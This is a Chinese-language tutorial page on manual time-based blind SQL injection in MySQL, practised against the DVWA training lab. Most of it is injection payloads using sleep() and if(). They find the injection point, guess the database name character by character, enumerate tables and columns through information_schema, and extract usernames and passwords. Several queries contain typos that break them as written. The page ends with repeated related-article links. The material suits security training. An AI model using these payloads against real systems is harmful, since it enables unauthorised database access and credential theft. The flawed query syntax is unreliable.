時間盲注手注

基於時間的盲注：

時間的概念：使用特定函式讓資料庫去執行，通過自己的設定，來檢視資料庫是否get到我們的請求

函式sleep（）設定資料庫的延時或者暫停的時間

函式limit 0，1 限制第乙個的第乙個字元

函式mid 1,1 從第乙個字元開始擷取，只擷取乙個

函式benchmark（引數一，引數二），第一是執行多少次，二是某項操作。

if(exp1,exp2,exp3)，如果滿足exp1,那麼執行exp2,否則執行exp3

1、找注入點

通過輸入以下兩行,根據返回的延遲判斷存在字元型注入

1 and sleep(5)#

1』 and sleep(5)#

2、獲取資訊

當前資料庫長度

select * from dvwa.users where user_id=1 and if(length(database())=1,sleep(5),』bye』);

//通過猜測資料庫的長度，如果正確的話，可以看到網頁的響應時間會有5秒

獲取每個字元

select * from dvwa.users where user_id=1 and if(ascii(substring(database(),1,1))=110,sleep(5),』bye』);

//這裡主要是通過從資料庫第乙個字元開始猜測，將資料庫的字元轉化為asicc碼，如果猜解正確就可以明顯的看見網頁的相應的時間為五秒

獲取資料庫中表

select * from dvwa.users where user_id=1 and if(ascii(mid((select distinc table_name from information_schema.colums where table_schema=database() limit 0,1)1,1))=102,sleep(5),』bye』);

//同上。這裡的limit主要的作用是限制輸出得是第乙個表的第乙個字元，mid限制的是從第乙個字元開始擷取，擷取乙個字元

猜解第乙個表的長度

1』 and if(length((select table_name from information_schema.tables where table_schema=『dvwa』 limit 0,1))=9,sleep(5),1)#

//原理類似上面的，用length來乙個個字元的猜解，將字元轉換為ascii來進行回顯

猜解第二個表的長度

1』 and if(length((select table_name from information_schema.tables where table_schema=『dvwa』 limit 1,1))=5,sleep(5),1)#

找有價值的表，users

4、獲取指定表中的字段

select * from dvwa.users where user_id=1 and if(ascii(mid((select distinc columns_name from information_schema.colums where table_schema=database() and table_name=』users』limit 0,1)1,1))=102,sleep(5),』bye』);

5、獲取內容

select * from dvwa.users where user_id=1 and if(ascii(mid((select concat(admin,0x7e,password)from users limit 0,1)1,1))=102,sleep(5),』bye』);

//if(exp1,exp2,exp3)，如果滿足exp1,那麼執行exp2,否則執行exp3

時間盲注手注

mysql 時間盲注 MySQL手注之時間盲注

布林盲注手注

SQL盲注時間盲注，dnslog盲注

時間盲注手注

mysql 時間盲注 MySQL手注之時間盲注

布林盲注手注

SQL盲注 時間盲注，dnslog盲注

相關推薦

SQL盲注時間盲注，dnslog盲注